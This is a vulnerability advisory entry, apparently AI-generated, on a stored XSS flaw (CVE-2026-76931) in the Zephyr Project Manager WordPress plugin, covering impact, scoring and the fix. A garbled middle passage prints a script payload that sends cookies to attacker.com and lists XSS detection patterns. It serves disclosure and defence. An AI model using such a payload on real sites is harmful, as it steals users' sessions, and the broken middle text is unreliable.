
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-76931 is a Stored Cross-Site Scripting (XSS) vulnerability in the Zephyr Project Manager plugin for WordPress, affecting all versions up to and including 3.3.205. The flaw exists in the message parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with Custom-level access or above to inject arbitrary web scripts. Exploitation is only possible when the 'Directly link to project' plugin setting is disabled. It was published on September 8, 2026, with a CVSS v3.1 base score of 6.4 (Medium) (Github Advisory, Wordfence).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The root cause is insufficient sanitization of the message parameter before it is stored and subsequently rendered in web pages. Relevant vulnerable code paths are found in AjaxHandler.php (line 305), Projects.php (line 1052), and Tasks.php (line 1308) within the plugin's source tree. Exploitation requires the attacker to be authenticated with at least Custom-level access and the 'Directly link to project' setting to be disabled (Github Advisory, Wordfence).
Successful exploitation allows authenticated attackers to persistently inject malicious JavaScript into pages served to other users, impacting both confidentiality (e.g., session token theft) and integrity (e.g., unauthorized page content modification). The scope is changed, meaning the injected scripts can affect users beyond the attacker's own session. Availability is not impacted. The attack vector is network-based and requires no user interaction beyond a victim visiting the injected page (Github Advisory).
There is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation as of the disclosure date. The CVE status is listed as 'Deferred' and NVD's SSVC assessment confirms exploitation is 'none' at this time. The EPSS score is approximately 0.193% (9th percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Github Advisory, Wordfence).
AjaxHandler.php) with a malicious JavaScript payload in the message parameter, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.admin-ajax.php) with unusually long or encoded message parameter values from low-privileged accounts.<script>, javascript:, onerror=, or other HTML event handler patterns within the message field.Update the Zephyr Project Manager plugin to a version newer than 3.3.205, which includes the fix introduced in changeset 3656930. As a temporary workaround, enabling the 'Directly link to project' plugin setting prevents exploitation of this specific vulnerability. Site administrators should also audit existing project and task message fields for any suspicious script content (Github Advisory, WordPress Changeset).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."